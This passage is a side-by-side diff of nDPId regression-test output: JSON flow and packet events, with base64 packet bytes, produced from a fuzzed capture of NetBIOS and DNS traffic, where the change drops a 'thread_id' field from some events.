00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1120470315653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120470315653,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlau4AAIARSsjAqAECwKgB\/wCKAIoA0VstEQ6FJ8CoAQIAigC7AAAgRUVEQURBRENERURHREZDtkNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFOEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP9TTUIlNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhBFYAAwABAAAAAgA2AFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoARDAwMjQ2NQAAAAAAAAAAAAUAA2EAAA8BVaoA"} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1120470315653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120470315653,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlau4AAIARSsjAqAECwKgB\/wCKAIoA0VstEQ6FJ8CoAQIAigC7AAAgRUVEQURBRENERURHREZDtkNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFOEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP9TTUIlNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhBFYAAwABAAAAAgA2AFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoARDAwMjQ2NQAAAAAAAAAAAAUAA2EAAA8BVaoA"}
00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
@@ -689,8 +689,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1120470344560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470344560,"pkt":"ADBUADRWAODtAW69CABFAABEavQAAIARTEHAqAECwKgBAQrVADUAMLAHdOoEAAABAAAAAAAAATEBMAEwAzEyNwdpTC1hZGRyBGFycGEAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1120470344560,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470344560,"pkt":"ADBUADRWAODtAW69CABFAABEavQAAIARTEHAqAECwKgBAQrVADUAMLAHdOoEAAABAAAAAAAAATEBMAEwAzEyNwdpTC1hZGRyBGFycGEAAAwAAQ=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470344560,"pkt":"AODtAW69ADBUADRWCABFAABbAACGAEARtz7AqAEBwKgBAgA1CtUAR5KDdOKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470344560,"pkt":"AODtAW69ADBUADRWCABFAABbAACGAEARtz7AqAEBwKgBAgA1CtUAR5KDdOKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470344562} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470344562}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00885{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00885{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -718,8 +718,8 @@
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470385615,"flow_last_seen":1120470385615,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470385615,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1120470386610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470386610,"pkt":"ADBUADRWAODtAW69CABFAABIawUAAKARTEzAqAECwKgBAQrYADUANEcJLuMBAAABAAAAAAAABV9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1120470386610,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470386610,"pkt":"ADBUADRWAODtAW69CABFAABIawUAAKARTEzAqAECwKgBAQrYADUANEcJLuMBAAABAAAAAAAABV9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470385615,"flow_last_seen":1120470386610,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470386610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470386610,"pkt":"ADBUADSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470386610,"pkt":"ADBUADSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470388613} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":392,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470388613}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1120470390616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470390616,"pkt":"ADBUADRWAODtAW69CABFAABIawsAAIARTEbAqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1120470390616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470390616,"pkt":"ADBUADRWAODtAW69CABFAABIawsAAIARTEbAqAECwKgBAQrYADUANPsJLuMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470385615,"flow_last_seen":1120470390616,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470390616,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2776,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00881{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00881{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470200673,"flow_last_seen":1120470200673,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.22.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -727,8 +727,8 @@
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470202676,"flow_last_seen":1120470208684,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1120470394622,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 